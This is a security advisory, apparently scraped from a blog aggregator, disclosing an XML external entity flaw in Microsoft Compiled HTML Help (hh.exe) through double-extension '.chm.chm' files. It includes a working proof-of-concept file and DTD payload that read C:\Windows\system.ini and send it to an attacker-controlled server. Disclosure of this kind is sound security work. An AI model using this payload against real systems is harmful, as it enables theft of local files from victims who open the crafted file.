Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-HTML-HELP-UNCOMPILED-CHM-FILE-XML-EXTERNAL-ENTITY-INJECTION.txt
[+] ISR: ApparitionSec
[Vendor]
www.microsoft.com
[Product]
Microsoft Compiled HTML Help "hh.exe"
Microsoft
Compiled HTML Help is a Microsoft proprietary online help format,
consisting of a collection of HTML pages, an index and other navigation
tools.
The files are compressed and deployed in a binary format with
the extension .CHM, for Compiled HTML. The format is often used for
software documentation.
CHM is an extension for the Compiled HTML file format, most commonly used by Microsoft's HTML-based help program.
[Vulnerability Type]
Uncompiled .CHM File XML External Entity Injection
[CVE Reference]
N/A
[Security Issue]
CHM
Files are usually created using Microsofts "HTML Help Workshop"
program. However, I find a way to bypass using this program and create
them easily by
simply adding double .chm extension to the file
".chm.chm". Compiled HTML Help "hh.exe" will then respect and open it
processing any JS/HTML/XML inside etc.
Compiled HTML Help is also
vulnerable to XML External Entity attacks allowing remote attackers to
steal and exfiltrate local system files.
Whats interesting about
this one is we can create the file without using the "Microsoft HTML
Help Workshop" program. Also, we can steal files without
having to use the "hhtctrl.ocx" ActiveX control CLASSID: 52a2aaae-085d-4187-97ea-8c30db990436 or other code execution methods.
While
CHM is already considered a "dangerous" file type and other type of
attacks have already been documented. I thought this was an interesting
way to
create CHM files "Uncompiled" bypassing the default creation steps while stealing local files in the process.
Note: User interaction is required to exploit this vulnerability.
[Exploit/POC]
1) python -m SimpleHTTPServer
2) "XXE.chm.chm"
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML//EN">
<HTML>
<HEAD>
<Title>Uncompiled CHM File XXE PoC</Title>
</HEAD>
<BODY>
<xml>
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE tastyexploits [
<!ENTITY % file SYSTEM "C:\Windows\system.ini">
<!ENTITY % dtd SYSTEM "http://localhost:81/payload.dtd">
%dtd;]>
<pwn>&send;</pwn>
</xml>
</BODY>
</HTML>
3) "payload.dtd" (hosted in python web-server dir port 8000 above)
<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % all "<!ENTITY send SYSTEM 'http://localhost:81?%file;'>">
%all;
Open the "XXE.chm.chm" file and will exfil Windows "system.ini", attacker Server IP is set to localhost using port 81 for PoC.
Tested successfully Windows 7/10
[POC Video URL]
https://www.youtube.com/watch?v=iaxp1iBDWXY
[Network Access]
Remote
[Severity]
High
[Disclosure Timeline]
Vendor Notification: April 25, 2019
MSRC Response: "We determined that this behavior is considered to be by design"
July 16, 2019 : Public Disclosure
[+] Disclaimer
The
information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
Permission
is hereby granted for the redistribution of this advisory, provided that
it is not altered except by reformatting it, and
that due credit is
given. Permission is explicitly given for insertion in vulnerability
databases and similar, provided that due credit
is given to the
author. The author is not responsible for any misuse of the information
contained herein and accepts no responsibility
for any damage caused
by the use or misuse of this information. The author prohibits any
malicious use of security related information
or exploits by the author or elsewhere. All content (c).
hyp3rlinx
Microsoft Compiled HTML Help / Uncompiled .chm File XML External Entity的更多相关文章
- Microsoft Internet Explorer v11 XML External Entity Injection 0day
[+] Credits: John Page (aka hyp3rlinx) [+] Website: hyp3rlinx.altervista.org[+] Source: http://hyp3 ...
- XML External Entity Injection(XXE)
写在前面 安全测试fortify扫描接口项目代码,暴露出标题XXE的问题, 记录一下.官网链接: https://www.owasp.org/index.php/XML_External_Entity ...
- XXE(XML External Entity attack)XML外部实体注入攻击
导语 XXE:XML External Entity 即外部实体,从安全角度理解成XML External Entity attack 外部实体注入攻击.由于程序在解析输入的XML数据时,解析了攻击者 ...
- XML External Entity attack/XXE攻击
XML External Entity attack/XXE攻击 1.相关背景介绍 可扩展标记语言(eXtensible Markup Language,XML)是一种标记语言,被设计用来传输和存 ...
- 【译】Attacking XML with XML External Entity Injection (XXE)
原文链接:Attacking XML with XML External Entity Injection (XXE) XXE:使用XML外部实体注入攻击XML 在XML中,有一种注入外部文件的方式. ...
- XML External Entity attack
解析外部xml给本地带来的安全隐患. https://en.wikipedia.org/wiki/XML_external_entity_attack An XML External Entity ( ...
- 4.XXE (XML External Entity Injection)
XXE (XML External Entity Injection) 0x01 什么是XXE XML外部实体注入 若是PHP,libxml_disable_entity_loader设置为TRUE可 ...
- Fortify漏洞之XML External Entity Injection(XML实体注入)
继续对Fortify的漏洞进行总结,本篇主要针对 XML External Entity Injection(XML实体注入) 的漏洞进行总结,如下: 1.1.产生原因: XML External ...
- Portswigger web security academy:XML external entity (XXE) injection
Portswigger web security academy:XML external entity (XXE) injection 目录 Portswigger web security aca ...
随机推荐
- 第09组 Alpha冲刺(2/4)
队名:软工9组 组长博客:https://www.cnblogs.com/cmlei/ 作业博客:http://edu.cnblogs.com/campus/fzu/SoftwareEngineeri ...
- Spring的异步方法
先把longTimeMethod 封装到Spring的异步方法中,这个异步方法的返回值是Future的实例.这个方法一定要写在Spring管理的类中,注意注解@Async. @Service publ ...
- /etc/bashrc
[ "$PS1" = "\\s-\\v\\\$ " ] && PS1="[\[\e[34;1m\]\u@\[\e[0m\]\[\e[3 ...
- cesharp 完美支持flash
直接上代码: cefSettings.CefCommandLineArgs.Add("enable-npapi", "1"); //cefSettings.Ce ...
- css重直居中代码
老是忘,记在这里: vertical-align: middle;
- 应用程序正常初始化(0xc0000135)失败。请单击“确定”,终止应用程序。
应用程序正常初始化(0xc0000135)失败.请单击“确定”,终止应用程序. 没有安装对应版本的.NET FRAMEWORK.
- MySQL之表关系
MySQL表关系 一对多关系 一对多与多对一是一个概念,指的是一个实体的某个数据与另外一个实体的多个数据有关联关系. 举例,学校中一个学.院可以有很多的学生,而一个学生只属于某一个学院(通常情况下), ...
- Django文档阅读之查询
创建对象 为了在Python对象中表示数据库表数据,Django使用直观的系统:模型类表示数据库表,该类的实例表示数据库表中的特定记录. 要创建对象,请使用模型类的关键字参数对其进行实例化,然后调用s ...
- 看看这5个最容易犯的Java错误,你犯了没?
人非圣贤,孰能无过.都说Java语言是一门简单的编程语言,基于C++演化而来,剔除了很多C++中的复杂特性,但这并不能保证Java程序员不会犯错.那么对于广大的Java程序员来说,它们最容易犯的几个错 ...
- Qt deletelater函数分析(2)
夫唯不争,故天下莫能与之争 -- 老子 在C++中,delete 和 new 必须 配对使用,Qt作为C++的库,显然是不会违背C++原则.但是,qt有自己的内存管理,有时候虽然使用了new, ...